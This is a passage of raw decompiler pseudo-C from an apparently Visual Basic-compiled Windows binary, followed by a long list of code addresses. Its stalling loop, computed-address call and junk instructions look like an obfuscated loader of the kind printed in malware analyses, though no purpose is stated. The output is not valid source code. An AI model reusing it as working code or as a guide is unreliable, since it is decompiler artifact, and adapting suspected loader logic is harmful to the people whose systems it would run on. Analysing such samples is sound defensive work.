        					_t1367 =  *((intOrPtr*)( *_v248 + 0x1a0))(_v248,  &_v204, _t1363,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x308))( *_v376));
        					asm("fclex");
        					_v252 = _t1367;
        					if(_v252 >= 0) {
        						_v380 = _v380 & 0x00000000;
        					} else {
        						_push(0x1a0);
        						_push(0x402d4c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v380 = _t1367;
        					}
        					if( *0x40e010 != 0) {
        						_v384 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v384 = 0x40e010;
        					}
        					_t1697 =  *((intOrPtr*)( *_v384));
        					_t1371 =  &_v92;
        					L00401366();
        					_v256 = _t1371;
        					_t1375 =  *((intOrPtr*)( *_v256 + 0x108))(_v256,  &_v80, _t1371,  *((intOrPtr*)(_t1697 + 0x300))( *_v384));
        					asm("fclex");
        					_v260 = _t1375;
        					if(_v260 >= 0) {
        						_v388 = _v388 & 0x00000000;
        					} else {
        						_push(0x108);
        						_push(0x402cb4);
        						_push(_v256);
        						_push(_v260);
        						L0040137E();
        						_v388 = _t1375;
        					}
        					_v288 = _v80;
        					_v80 = _v80 & 0x00000000;
        					_v104 = _v288;
        					_v112 = 8;
        					_v228 =  *0x401128;
        					_v220 =  *0x401120;
        					_v136 = 0x8909d4;
        					_v144 = 3;
        					 *_t1815 =  *0x401118;
        					L00401240();
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					asm("movsd");
        					_t1385 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x10,  &_v220, 0xdd379050, 0x5afa, _v196,  &_v228, _v204, _t1697, _t1697,  &_v112,  &_v208);
        					_v264 = _t1385;
        					if(_v264 >= 0) {
        						_v392 = _v392 & 0x00000000;
        					} else {
        						_push(0x704);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v264);
        						L0040137E();
        						_v392 = _t1385;
        					}
        					_v60 = _v208;
        					_push( &_v92);
        					_push( &_v88);
        					_push( &_v84);
        					_push(3);
        					L00401348();
        					_t1816 = _t1815 + 0x10;
        					L00401372();
        					if( *0x40e010 != 0) {
        						_v396 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v396 = 0x40e010;
        					}
        					_t1393 =  &_v84;
        					L00401366();
        					_v240 = _t1393;
        					_t1397 =  *((intOrPtr*)( *_v240 + 0x78))(_v240,  &_v204, _t1393,  *((intOrPtr*)( *((intOrPtr*)( *_v396)) + 0x304))( *_v396));
        					asm("fclex");
        					_v244 = _t1397;
        					if(_v244 >= 0) {
        						_v400 = _v400 & 0x00000000;
        					} else {
        						_push(0x78);
        						_push(0x402cb4);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v400 = _t1397;
        					}
        					if( *0x40e010 != 0) {
        						_v404 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v404 = 0x40e010;
        					}
        					_t1401 =  &_v88;
        					L00401366();
        					_v248 = _t1401;
        					_t1405 =  *((intOrPtr*)( *_v248 + 0xe0))(_v248,  &_v196, _t1401,  *((intOrPtr*)( *((intOrPtr*)( *_v404)) + 0x310))( *_v404));
        					asm("fclex");
        					_v252 = _t1405;
        					if(_v252 >= 0) {
        						_v408 = _v408 & 0x00000000;
        					} else {
        						_push(0xe0);
        						_push(0x402d3c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v408 = _t1405;
        					}
        					if( *0x40e010 != 0) {
        						_v412 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v412 = 0x40e010;
        					}
        					_t1707 =  *((intOrPtr*)( *_v412));
        					_t1409 =  &_v92;
        					L00401366();
        					_v256 = _t1409;
        					_t1413 =  *((intOrPtr*)( *_v256 + 0x130))(_v256,  &_v96, _t1409,  *((intOrPtr*)(_t1707 + 0x304))( *_v412));
        					asm("fclex");
        					_v260 = _t1413;
        					if(_v260 >= 0) {
        						_v416 = _v416 & 0x00000000;
        					} else {
        						_push(0x130);
        						_push(0x402cb4);
        						_push(_v256);
        						_push(_v260);
        						L0040137E();
        						_v416 = _t1413;
        					}
        					_v212 = 0x7a0394;
        					_v292 = _v96;
        					_v96 = _v96 & 0x00000000;
        					_v104 = _v292;
        					_v112 = 9;
        					_v228 = 0x3151d390;
        					_v224 = 0x5afa;
        					_v220 =  *0x401110;
        					_v208 = _v204;
        					 *_t1816 =  *0x401108;
        					 *_t1816 =  *0x401100;
        					 *((intOrPtr*)( *_a4 + 0x718))(_a4, _t1707, _t1707,  &_v208,  &_v220,  &_v228, _v196,  &_v112,  &_v212, _t1707,  &_v236);
        					_v76 = _v236;
        					_v72 = _v232;
        					_push( &_v92);
        					_push( &_v88);
        					_push( &_v84);
        					_push(3);
        					L00401348();
        					_t1817 = _t1816 + 0x10;
        					L00401372();
        					if( *0x40e010 != 0) {
        						_v420 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v420 = 0x40e010;
        					}
        					_t1433 =  &_v84;
        					L00401366();
        					_v240 = _t1433;
        					_t1437 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v204, _t1433,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x30c))( *_v420));
        					asm("fclex");
        					_v244 = _t1437;
        					if(_v244 >= 0) {
        						_v424 = _v424 & 0x00000000;
        					} else {
        						_push(0x68);
        						_push(0x402d5c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v424 = _t1437;
        					}
        					if( *0x40e010 != 0) {
        						_v428 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v428 = 0x40e010;
        					}
        					_t1441 =  &_v88;
        					L00401366();
        					_v248 = _t1441;
        					_t1445 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v208, _t1441,  *((intOrPtr*)( *((intOrPtr*)( *_v428)) + 0x2fc))( *_v428));
        					asm("fclex");
        					_v252 = _t1445;
        					if(_v252 >= 0) {
        						_v432 = _v432 & 0x00000000;
        					} else {
        						_push(0x138);
        						_push(0x402cb4);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v432 = _t1445;
        					}
        					_v212 = _v204;
        					_t1449 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x5573,  &_v212, _v208);
        					_v256 = _t1449;
        					if(_v256 >= 0) {
        						_v436 = _v436 & 0x00000000;
        					} else {
        						_push(0x708);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v256);
        						L0040137E();
        						_v436 = _t1449;
        					}
        					_push( &_v88);
        					_push( &_v84);
        					_push(2);
        					L00401348();
        					_t1818 = _t1817 + 0xc;
        					if( *0x40e010 != 0) {
        						_v440 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v440 = 0x40e010;
        					}
        					_t1455 =  &_v84;
        					L00401366();
        					_v240 = _t1455;
        					_t1459 =  *((intOrPtr*)( *_v240 + 0x140))(_v240,  &_v80, _t1455,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x310))( *_v440));
        					asm("fclex");
        					_v244 = _t1459;
        					if(_v244 >= 0) {
        						_v444 = _v444 & 0x00000000;
        					} else {
        						_push(0x140);
        						_push(0x402d3c);
        						_push(_v240);
        						_push(_v244);
        						L0040137E();
        						_v444 = _t1459;
        					}
        					if( *0x40e010 != 0) {
        						_v448 = 0x40e010;
        					} else {
        						_push(0x40e010);
        						_push(0x401f6c);
        						L00401360();
        						_v448 = 0x40e010;
        					}
        					_t1720 =  *((intOrPtr*)( *_v448));
        					_t1463 =  &_v88;
        					L00401366();
        					_v248 = _t1463;
        					_t1467 =  *((intOrPtr*)( *_v248 + 0x80))(_v248,  &_v204, _t1463,  *((intOrPtr*)(_t1720 + 0x308))( *_v448));
        					asm("fclex");
        					_v252 = _t1467;
        					if(_v252 >= 0) {
        						_v452 = _v452 & 0x00000000;
        					} else {
        						_push(0x80);
        						_push(0x402d4c);
        						_push(_v248);
        						_push(_v252);
        						L0040137E();
        						_v452 = _t1467;
        					}
        					_v208 = _v204;
        					_v296 = _v80;
        					_v80 = _v80 & 0x00000000;
        					_v104 = _v296;
        					_v112 = 8;
        					 *_t1818 =  *0x4010f8;
        					_t1475 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v112, _t1720, _t1720,  &_v208,  &_v212);
        					_v256 = _t1475;
        					if(_v256 >= 0) {
        						_v456 = _v456 & 0x00000000;
        					} else {
        						_push(0x70c);
        						_push(0x402adc);
        						_push(_a4);
        						_push(_v256);
        						L0040137E();
        						_v456 = _t1475;
        					}
        					_v36 = _v212;
        					L00401348();
        					_t1819 = _t1818 + 0xc;
        					L00401372();
        					_t1480 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v84,  &_v88);
        					asm("fclex");
        					_v240 = _t1480;
        					if(_v240 >= 0) {
        						_v460 = _v460 & 0x00000000;
        					} else {
        						_push(0x2b4);
        						_push(0x402aa8);
        						_push(_a4);
        						_push(_v240);
        						L0040137E();
        						_v460 = _t1480;
        					}
        					_v272 = 0x5ae61;
        					_v268 = 1;
        					_v28 = _v28 & 0x00000000;
        					while(_v28 <= _v272) {
        						if( *0x40e010 != 0) {
        							_v464 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v464 = 0x40e010;
        						}
        						_t1486 =  &_v84;
        						L00401366();
        						_v240 = _t1486;
        						_t1490 =  *((intOrPtr*)( *_v240 + 0x140))(_v240,  &_v80, _t1486,  *((intOrPtr*)( *((intOrPtr*)( *_v464)) + 0x310))( *_v464));
        						asm("fclex");
        						_v244 = _t1490;
        						if(_v244 >= 0) {
        							_v468 = _v468 & 0x00000000;
        						} else {
        							_push(0x140);
        							_push(0x402d3c);
        							_push(_v240);
        							_push(_v244);
        							L0040137E();
        							_v468 = _t1490;
        						}
        						if( *0x40e010 != 0) {
        							_v472 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v472 = 0x40e010;
        						}
        						_t1731 =  *((intOrPtr*)( *_v472));
        						_t1494 =  &_v88;
        						L00401366();
        						_v248 = _t1494;
        						_t1498 =  *((intOrPtr*)( *_v248 + 0x80))(_v248,  &_v204, _t1494,  *((intOrPtr*)(_t1731 + 0x308))( *_v472));
        						asm("fclex");
        						_v252 = _t1498;
        						if(_v252 >= 0) {
        							_v476 = _v476 & 0x00000000;
        						} else {
        							_push(0x80);
        							_push(0x402d4c);
        							_push(_v248);
        							_push(_v252);
        							L0040137E();
        							_v476 = _t1498;
        						}
        						_v208 = _v204;
        						_v300 = _v80;
        						_v80 = _v80 & 0x00000000;
        						_v104 = _v300;
        						_v112 = 8;
        						 *_t1819 =  *0x4010f8;
        						_t1506 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v112, _t1731, _t1731,  &_v208,  &_v212);
        						_v256 = _t1506;
        						if(_v256 >= 0) {
        							_v480 = _v480 & 0x00000000;
        						} else {
        							_push(0x70c);
        							_push(0x402adc);
        							_push(_a4);
        							_push(_v256);
        							L0040137E();
        							_v480 = _t1506;
        						}
        						_v36 = _v212;
        						_push( &_v88);
        						_push( &_v84);
        						_push(2);
        						L00401348();
        						_t1820 = _t1819 + 0xc;
        						L00401372();
        						if( *0x40e010 != 0) {
        							_v484 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v484 = 0x40e010;
        						}
        						_t1512 =  &_v84;
        						L00401366();
        						_v240 = _t1512;
        						_t1516 =  *((intOrPtr*)( *_v240 + 0x68))(_v240,  &_v204, _t1512,  *((intOrPtr*)( *((intOrPtr*)( *_v484)) + 0x30c))( *_v484));
        						asm("fclex");
        						_v244 = _t1516;
        						if(_v244 >= 0) {
        							_v488 = _v488 & 0x00000000;
        						} else {
        							_push(0x68);
        							_push(0x402d5c);
        							_push(_v240);
        							_push(_v244);
        							L0040137E();
        							_v488 = _t1516;
        						}
        						if( *0x40e010 != 0) {
        							_v492 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v492 = 0x40e010;
        						}
        						_t1520 =  &_v88;
        						L00401366();
        						_v248 = _t1520;
        						_t1524 =  *((intOrPtr*)( *_v248 + 0x138))(_v248,  &_v208, _t1520,  *((intOrPtr*)( *((intOrPtr*)( *_v492)) + 0x2fc))( *_v492));
        						asm("fclex");
        						_v252 = _t1524;
        						if(_v252 >= 0) {
        							_v496 = _v496 & 0x00000000;
        						} else {
        							_push(0x138);
        							_push(0x402cb4);
        							_push(_v248);
        							_push(_v252);
        							L0040137E();
        							_v496 = _t1524;
        						}
        						_v212 = _v204;
        						_t1528 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 0x5573,  &_v212, _v208);
        						_v256 = _t1528;
        						if(_v256 >= 0) {
        							_v500 = _v500 & 0x00000000;
        						} else {
        							_push(0x708);
        							_push(0x402adc);
        							_push(_a4);
        							_push(_v256);
        							L0040137E();
        							_v500 = _t1528;
        						}
        						_push( &_v88);
        						_push( &_v84);
        						_push(2);
        						L00401348();
        						_t1821 = _t1820 + 0xc;
        						if( *0x40e010 != 0) {
        							_v504 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v504 = 0x40e010;
        						}
        						_t1534 =  &_v84;
        						L00401366();
        						_v240 = _t1534;
        						_t1538 =  *((intOrPtr*)( *_v240 + 0x158))(_v240,  &_v196, _t1534,  *((intOrPtr*)( *((intOrPtr*)( *_v504)) + 0x308))( *_v504));
        						asm("fclex");
        						_v244 = _t1538;
        						if(_v244 >= 0) {
        							_v508 = _v508 & 0x00000000;
        						} else {
        							_push(0x158);
        							_push(0x402d4c);
        							_push(_v240);
        							_push(_v244);
        							L0040137E();
        							_v508 = _t1538;
        						}
        						if( *0x40e010 != 0) {
        							_v512 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v512 = 0x40e010;
        						}
        						_t1542 =  &_v88;
        						L00401366();
        						_v248 = _t1542;
        						_t1546 =  *((intOrPtr*)( *_v248 + 0x1a0))(_v248,  &_v204, _t1542,  *((intOrPtr*)( *((intOrPtr*)( *_v512)) + 0x308))( *_v512));
        						asm("fclex");
        						_v252 = _t1546;
        						if(_v252 >= 0) {
        							_v516 = _v516 & 0x00000000;
        						} else {
        							_push(0x1a0);
        							_push(0x402d4c);
        							_push(_v248);
        							_push(_v252);
        							L0040137E();
        							_v516 = _t1546;
        						}
        						if( *0x40e010 != 0) {
        							_v520 = 0x40e010;
        						} else {
        							_push(0x40e010);
        							_push(0x401f6c);
        							L00401360();
        							_v520 = 0x40e010;
        						}
        						_t1747 =  *((intOrPtr*)( *_v520));
        						_t1550 =  &_v92;
        						L00401366();
        						_v256 = _t1550;
        						_t1554 =  *((intOrPtr*)( *_v256 + 0x108))(_v256,  &_v80, _t1550,  *((intOrPtr*)(_t1747 + 0x300))( *_v520));
        						asm("fclex");
        						_v260 = _t1554;
        						if(_v260 >= 0) {
        							_v524 = _v524 & 0x00000000;
        						} else {
        							_push(0x108);
        							_push(0x402cb4);
        							_push(_v256);
        							_push(_v260);
        							L0040137E();
        							_v524 = _t1554;
        						}
        						_v304 = _v80;
        						_v80 = _v80 & 0x00000000;
        						_v104 = _v304;
        						_v112 = 8;
        						_v228 =  *0x401128;
        						_v220 =  *0x401120;
        						_v136 = 0x8909d4;
        						_v144 = 3;
        						 *_t1821 =  *0x401118;
        						L00401240();
        						_t1796 =  &_v144;
        						_t1786 = _t1821;
        						asm("movsd");
        						asm("movsd");
        						asm("movsd");
        						asm("movsd");
        						_t1564 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, 0x10,  &_v220, 0xdd379050, 0x5afa, _v196,  &_v228, _v204, _t1747, _t1747,  &_v112,  &_v208);
        						_v264 = _t1564;
        						if(_v264 >= 0) {
        							_v528 = _v528 & 0x00000000;
        						} else {
        							_push(0x704);
        							_push(0x402adc);
        							_push(_a4);
        							_push(_v264);
        							L0040137E();
        							_v528 = _t1564;
        						}
        						_v60 = _v208;
        						_push( &_v92);
        						_push( &_v88);
        						_push( &_v84);
        						_push(3);
        						L00401348();
        						_t1819 = _t1821 + 0x10;
        						L00401372();
        						_t1570 = _v28 + _v268;
        						if(_t1570 < 0) {
        							L0040133C();
        							_t1822 = _t1819 - 0xc;
        							 *[fs:0x0] = _t1822;
        							L00401240();
        							_v801 = _t1822;
        							_v797 = 0x401178;
        							_v793 = 0;
        							 *((intOrPtr*)( *_v781 + 4))(_v781, _t1786, _t1796, _t1661,  *[fs:0x0], 0x401246, _t1802);
        							if( *0x40e010 != 0) {
        								_v124 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v124 = 0x40e010;
        							}
        							_t1579 =  &_v32;
        							L00401366();
        							_v88 = _t1579;
        							_t1583 =  *((intOrPtr*)( *_v88 + 0x120))(_v88,  &_v80, _t1579,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x30c))( *_v124));
        							asm("fclex");
        							_v92 = _t1583;
        							if(_v92 >= 0) {
        								_v128 = _v128 & 0x00000000;
        							} else {
        								_push(0x120);
        								_push(0x402d5c);
        								_push(_v88);
        								_push(_v92);
        								L0040137E();
        								_v128 = _t1583;
        							}
        							_v52 = _v80;
        							_v60 = 3;
        							_t1585 =  &_v60;
        							_push(_t1585);
        							L00401336();
        							_v96 =  ~(0 | _t1585 != 0x0000ffff);
        							L00401378();
        							L00401372();
        							_t1586 = _v96;
        							if(_t1586 == 0) {
        								L268:
        								asm("wait");
        								_push(0x40c4f9);
        								return _t1586;
        							}
        							if( *0x40e010 != 0) {
        								_v132 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v132 = 0x40e010;
        							}
        							_t1590 =  &_v32;
        							L00401366();
        							_v88 = _t1590;
        							_t1594 =  *((intOrPtr*)( *_v88 + 0x180))(_v88,  &_v80, _t1590,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x30c))( *_v132));
        							asm("fclex");
        							_v92 = _t1594;
        							if(_v92 >= 0) {
        								_v136 = _v136 & 0x00000000;
        							} else {
        								_push(0x180);
        								_push(0x402d5c);
        								_push(_v88);
        								_push(_v92);
        								L0040137E();
        								_v136 = _t1594;
        							}
        							if( *0x40e010 != 0) {
        								_v140 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v140 = 0x40e010;
        							}
        							_t1598 =  &_v36;
        							L00401366();
        							_v96 = _t1598;
        							_t1602 =  *((intOrPtr*)( *_v96 + 0x100))(_v96,  &_v40, _t1598,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x30c))( *_v140));
        							asm("fclex");
        							_v100 = _t1602;
        							if(_v100 >= 0) {
        								_v144 = _v144 & 0x00000000;
        							} else {
        								_push(0x100);
        								_push(0x402d5c);
        								_push(_v96);
        								_push(_v100);
        								L0040137E();
        								_v144 = _t1602;
        							}
        							_push(0);
        							_push(0);
        							_push(_v40);
        							_push( &_v60);
        							L00401330();
        							_t1823 = _t1822 + 0x10;
        							if( *0x40e010 != 0) {
        								_v148 = 0x40e010;
        							} else {
        								_push(0x40e010);
        								_push(0x401f6c);
        								L00401360();
        								_v148 = 0x40e010;
        							}
        							_t1765 =  *((intOrPtr*)( *_v148));
        							_t1607 =  &_v44;
        							L00401366();
        							_v104 = _t1607;
        							_t1611 =  *((intOrPtr*)( *_v104 + 0x60))(_v104,  &_v84, _t1607,  *((intOrPtr*)(_t1765 + 0x310))( *_v148));
        							asm("fclex");
        							_v108 = _t1611;
        							if(_v108 >= 0) {
        								_v152 = _v152 & 0x00000000;
        							} else {
        								_push(0x60);
        								_push(0x402d3c);
        								_push(_v104);
        								_push(_v108);
        								L0040137E();
        								_v152 = _t1611;
        							}
        							L0040132A();
        							_t1965 =  *0x401168;
        							 *_t1823 = _t1965;
        							asm("fild dword [ebp-0x4c]");
        							_v156 = _t1965;
        							_t1966 = _v156;
        							 *_t1823 = _t1966;
        							_t1612 =  &_v60;
        							L00401324();
        							_v160 = _t1612;
        							asm("fild dword [ebp-0x98]");
        							_v164 = _t1966;
        							_t1967 = _v164;
        							 *_t1823 = _t1967;
        							asm("fild dword [ebp-0x48]");
        							_v168 = _t1967;
        							 *_t1823 = _v168;
        							_t1615 =  *((intOrPtr*)( *_v0 + 0x2c8))(_v0, 6, _t1765, _t1765, _t1612, _t1765, _t1765, _t1611);
        							asm("fclex");
        							_v112 = _t1615;
        							if(_v112 >= 0) {
        								_v172 = _v172 & 0x00000000;
        							} else {
        								_push(0x2c8);
        								_push(0x402aa8);
        								_push(_v0);
        								_push(_v112);
        								L0040137E();
        								_v172 = _t1615;
        							}
        							_push( &_v40);
        							_push( &_v44);
        							_push( &_v36);
        							_t1586 =  &_v32;
        							_push(_t1586);
        							_push(4);
        							L00401348();
        							L00401372();
        							goto L268;
        						}
        						_v28 = _t1570;
        					}
        					_t1482 =  *((intOrPtr*)(0x2c1572 +  *_t1819))(0x147e9d);
        					_push(0x40c127);
        					L00401372();
        					L00401378();
        					return _t1482;
        					L51:
        					asm("retf 0x3b62");
        					asm("das");
        					 *((intOrPtr*)(_t1667 - 0x5f)) = cs;
        					goto L52;
        				}
        			}





































































































































































































































































































































































        0x004013b0
        0x004013b0
        0x004013b0
        0x004013b0
        0x004013b5
        0x004013ba
        0x004013bc
        0x004013be
        0x004013c0
        0x004013c2
        0x004013c4
        0x004013c5
        0x004013c7
        0x004013c9
        0x004013cb
        0x004013cc
        0x004013cd
        0x004013ce
        0x004013d0
        0x004013d4
        0x004013d7
        0x004013dd
        0x004013df
        0x004013e1
        0x004013e3
        0x004013e5
        0x004013e7
        0x004013e9
        0x004013ee
        0x004013ef
        0x004013f1
        0x004013f5
        0x004013f7
        0x004013f9
        0x004013fc
        0x004013fe
        0x00401400
        0x00401402
        0x00401404
        0x00401405
        0x0040140a
        0x0040140f
        0x00401414
        0x00401419
        0x0040141f
        0x00401423
        0x00401424
        0x00401428
        0x00401429
        0x0040142a
        0x0040142c
        0x00401432
        0x00401433
        0x00401439
        0x0040143b
        0x0040143d
        0x0040143f
        0x00401441
        0x00401443
        0x00401445
        0x00401447
        0x00401449
        0x0040144b
        0x0040144d
        0x0040144f
        0x00401451
        0x00401453
        0x00401455
        0x00401455
        0x00401456
        0x00401458
        0x0040145e
        0x00401460
        0x00401462
        0x00401464
        0x0040146b
        0x004014d2
        0x004014d2
        0x004014d4
        0x004014d4
        0x004014d7
        0x00401542
        0x00401543
        0x00401544
        0x00401545
        0x00401546
        0x00401547
        0x00401548
        0x0040154b
        0x0040154d
        0x0040154e
        0x0040154e
        0x0040154e
        0x00401551
        0x00000000
        0x00401553
        0x00401553
        0x00000000
        0x00401555
        0x00401555
        0x00401559
        0x0040155c
        0x0040155d
        0x00401562
        0x00401566
        0x00401568
        0x0040156a
        0x0040156b
        0x00000000
        0x0040156b
        0x00401553
        0x00000000
        0x00000000
        0x00000000
        0x0040146d
        0x0040146d
        0x0040146d
        0x00401473
        0x00401474
        0x004014df
        0x004014df
        0x004014e1
        0x004014e2
        0x004014e6
        0x004014e7
        0x004014e8
        0x004014e9
        0x004014ea
        0x004014ea
        0x00000000
        0x00401476
        0x00401476
        0x004014d9
        0x004014d9
        0x004014da
        0x004014db
        0x004014dd
        0x004014de
        0x00000000
        0x00401478
        0x00401478
        0x00401479
        0x0040147b
        0x0040147d
        0x0040147e
        0x00401480
        0x00401483
        0x00401483
        0x00401483
        0x00401486
        0x004014f1
        0x004014f1
        0x004014f2
        0x004014f4
        0x004014f4
        0x004014f7
        0x004014f9
        0x004014fe
        0x004014ff
        0x004014ff
        0x00401502
        0x0040156d
        0x0040156d
        0x0040156e
        0x0040156f
        0x00401572
        0x00401579
        0x0040157a
        0x0040157f
        0x0040157f
        0x00401582
        0x00401583
        0x00401584
        0x00401586
        0x00401589
        0x0040158b
        0x0040158d
        0x0040158e
        0x00401590
        0x00401592
        0x00401597
        0x00401598
        0x0040159a
        0x0040159f
        0x004015a0
        0x004015a2
        0x004015a4
        0x004015a4
        0x004015a6
        0x004015a9
        0x004015ab
        0x004015ad
        0x004015b1
        0x004015b3
        0x004015b5
        0x004015b7
        0x004015b9
        0x004015bb
        0x004015bf
        0x004015c1
        0x004015c3
        0x004015c4
        0x004015c4
        0x004015c5
        0x004015c7
        0x004015c7
        0x004015c9
        0x004015cf
        0x004015d0
        0x004015d2
        0x004015d4
        0x004015da
        0x004015dc
        0x004015df
        0x004015e1
        0x004015ea
        0x004015ec
        0x004015ec
        0x00401504
        0x00401504
        0x00401505
        0x00401506
        0x00401508
        0x00401509
        0x0040150c
        0x0040150d
        0x0040150e
        0x0040150f
        0x00401510
        0x00401516
        0x00000000
        0x00401516
        0x00401488
        0x00401488
        0x004014eb
        0x004014eb
        0x004014f0
        0x00000000
        0x0040148a
        0x0040148a
        0x0040148b
        0x00401491
        0x00401493
        0x00401495
        0x0040149a
        0x0040149c
        0x004014a0
        0x004014a2
        0x004014a4
        0x004014a6
        0x004014a8
        0x004014a9
        0x004014a9
        0x004014ac
        0x00401517
        0x00401517
        0x0040151e
        0x00401520
        0x00401522
        0x00000000
        0x004014ae
        0x004014ae
        0x004014af
        0x004014b0
        0x004014b2
        0x004014b3
        0x004014b5
        0x004014b5
        0x004014b8
        0x00401526
        0x00401526
        0x00401527
        0x004014ba
        0x004014ba
        0x004014c4
        0x004014c6
        0x004014c8
        0x004014ca
        0x004014cf
        0x004014d1
        0x00000000
        0x004014d1
        0x004014b8
        0x004014ac
        0x00401488
        0x00401486
        0x00401476
        0x00401474
        0x004015ee
        0x004015ef
        0x004015f1
        0x004015f3
        0x004015f5
        0x004015f7
        0x004015f9
        0x004015fb
        0x004015fd
        0x004015ff
        0x00401602
        0x00401603
        0x00401609
        0x0040160b
        0x0040160f
        0x00401611
        0x00401613
        0x00401615
        0x00401617
        0x00401619
        0x0040161b
        0x0040161d
        0x0040161f
        0x00401621
        0x00401623
        0x0040162a
        0x0040162c
        0x0040162e
        0x00401630
        0x00401632
        0x00401634
        0x00401636
        0x0040163d
        0x0040163f
        0x00401641
        0x00401643
        0x00401647
        0x00401649
        0x0040164b
        0x0040164d
        0x0040164f
        0x00401651
        0x00401653
        0x00401657
        0x00401659
        0x0040165b
        0x00401662
        0x00401664
        0x00401666
        0x00401668
        0x0040166a
        0x0040166c
        0x0040166e
        0x00401670
        0x00401677
        0x00401679
        0x0040167f
        0x00401681
        0x00401683
        0x00401685
        0x00401687
        0x00401689
        0x0040168b
        0x00401691
        0x00401694
        0x0040169a
        0x0040169c
        0x0040169e
        0x004016a0
        0x004016a2
        0x004016a4
        0x004016a6
        0x004016a8
        0x004016ab
        0x004016af
        0x004016b1
        0x004016b3
        0x004016b9
        0x004016bb
        0x004016bd
        0x004016bf
        0x004016c1
        0x004016c6
        0x004016c7
        0x004016c9
        0x004016cf
        0x004016d1
        0x004016d5
        0x004016d7
        0x004016d9
        0x004016db
        0x004016dd
        0x004016df
        0x004016e3
        0x004016e6
        0x004016e7
        0x004016e9
        0x004016eb
        0x004016ef
        0x004016f1
        0x004016f3
        0x004016f5
        0x004016f7
        0x004016f9
        0x004016fb
        0x004016fd
        0x004016fe
        0x004016ff
        0x00401701
        0x00401703
        0x00401705
        0x0040170a
        0x0040170c
        0x0040170e
        0x00401710
        0x00401712
        0x00401714
        0x00401716
        0x00401718
        0x0040171a
        0x0040171b
        0x0040171e
        0x0040171f
        0x00401721
        0x00401723
        0x00401729
        0x0040172b
        0x0040172d
        0x0040172f
        0x00401731
        0x00401733
        0x00401735
        0x00401736
        0x00401737
        0x00401739
        0x0040173b
        0x0040173d
        0x0040173d
        0x00401740
        0x00401742
        0x00401744
        0x00401746
        0x00401748
        0x0040174a
        0x0040174c
        0x0040174e
        0x00401750
        0x00401751
        0x00401753
        0x00401759
        0x0040175b
        0x0040175e
        0x00401760
        0x00401762
        0x00401764
        0x00401766
        0x00401768
        0x0040176a
        0x0040176c
        0x0040176e
        0x0040176f
        0x00401771
        0x00401773
        0x00401775
        0x0040177a
        0x0040177c
        0x0040177e
        0x00401780
        0x00401782
        0x00401784
        0x00401784
        0x00401785
        0x00401789
        0x0040178b
        0x00401791
        0x00401793
        0x00401799
        0x0040179b
        0x0040179d
        0x0040179f
        0x004017a1
        0x004017a3
        0x004017a9
        0x004017ab
        0x004017ad
        0x004017b2
        0x004017b4
        0x004017b6
        0x004017b8
        0x004017ba
        0x004017bc
        0x004017be
        0x004017c2
        0x004017c3
        0x004017c9
        0x004017cb
        0x004017cf
        0x004017d1
        0x004017d3
        0x004017d5
        0x004017d7
        0x004017d9
        0x004017dd
        0x004017df
        0x004017e1
        0x004017e3
        0x004017ea
        0x004017ec
        0x004017ee
        0x004017f0
        0x004017f2
        0x004017f4
        0x004017f6
        0x004017f8
        0x004017fb
        0x004017fd
        0x004017ff
        0x00401801
        0x00401803
        0x00401807
        0x00401809
        0x0040180b
        0x0040180d
        0x0040180f
        0x00401811
        0x00401813
        0x00401815
        0x00401818
        0x0040181a
        0x0040181c
        0x00401822
        0x00401824
        0x00401826
        0x00401828
        0x0040182a
        0x0040182c
        0x0040182e
        0x00401830
        0x00401831
        0x00401833
        0x00401835
        0x00401837
        0x00401839
        0x0040183b
        0x0040183f
        0x00401841
        0x00401843
        0x00401845
        0x00401847
        0x00401849
        0x0040184b
        0x0040184e
        0x0040184f
        0x00401851
